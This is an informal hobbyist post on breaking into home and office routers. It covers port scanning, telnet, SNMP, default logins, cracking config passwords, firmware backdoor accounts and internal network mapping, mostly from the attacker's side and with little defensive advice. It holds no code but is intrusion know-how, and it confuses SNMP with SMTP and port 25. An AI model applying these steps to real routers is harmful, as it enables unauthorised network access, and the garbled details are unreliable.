Router hacking

Port Scanning
----------------

One of the first steps in targeting routers is a port scan on the suspected addresses. Scanning for ports 23, 25 and 80 will usually provide plenty of routers to play with. I reccomend using nmap as you can combine it with grep to parse out the open systems and pipe them into a file. The next step is to go through your list of routers with a web browser (This may take some time).

Telnet
-------

Often telnet is used on routers which can be accessed via port 23, this provides an alternative command based configuratiuon that provides users with another doorway into the system. If an attacker cant access the main configuration page on port 80 then he will try port 23 as usually the login credentials are the same. Sometimes the information and utilities accessable via telnet are more detailed and can provide an attacker a wealth of information as well as tools to penetrate deeper into the network.

SMNP
------

Alot of routers i have come across use some form of smtp on port 161. This can be very useful to an attacker as quite often they are not secured and enable an attacker to download the configuration files and even extract a copy of the password. Passwords are usually encrypted but if they are like cisco then the strength of the algortithm is not enough as many tools exist on the internet to crack the password.

HTTP
------

This is the internal website of the router Usually the main web configuration page is on port 80 and can be accessed from any web browser. Here you can access the various network utilities for configuring your router. If an attacker has access to this page then its game over and your router can be considered OWNED lol. Many routers provide adequate security for preventing access but usually security is disabled or at best weak by default.

Gaining Access
-----------------

Once a router has been found an attacker has a couple of methods of access the main configuration pages. By testing the default usernames and passwords or trying to obtain the config files with the passwords contained inside you can sometimes access the router with relative ease. Personally i am suprised at the amount of routers which are not secure

Default Logins
----------------

Most Routers have a tendancy to use default login (admin:admin) Disabiling default logins or changing the password should prevent access to the main web configuration page builtin to the router. Some routers such as the ones BT provide do not come passwords, So attackers wanting to access a network have an easy time playing with BT users.

Config Files
--------------

Some routers have port 25 enabled by default, This can be used to obtain strings and enumerate various bits of data inside the router. Once valid strings have been found and the password has been obtained the next stage is to crack it. Finding out the encryption type is a simple matter of googling the router and finding out everything there is to know about it and the various algorithms it uses. Accessing a cisco was an easy job at one point as there were tools floating on the internet built for cracking the password stored in such config files.

Advancing your exploration
-------------------------------

Once an attacker has penetrated your router he has a choice. He can either download the firmware and modify it creating a new hidden account or start accessing your network.

Network Mapping
--------------------

Some Routers also have the ability to ping hosts connected to the local network. This could be used to map out the internal network before they implement port forwarding to access other systems on the network. This should be disabled to prevent malicious users from mapping out your network. However if they have access to the web config then they could enable it again.

Port Forwarding
------------------

Port forwarding is used to provide a sort of gateway to other systems on a network. If you know port 21 (FTP) is active on a system behind the router, Then turning on port forwarding and pointing the client to the routers IP will connect to the FTP port on the remote system.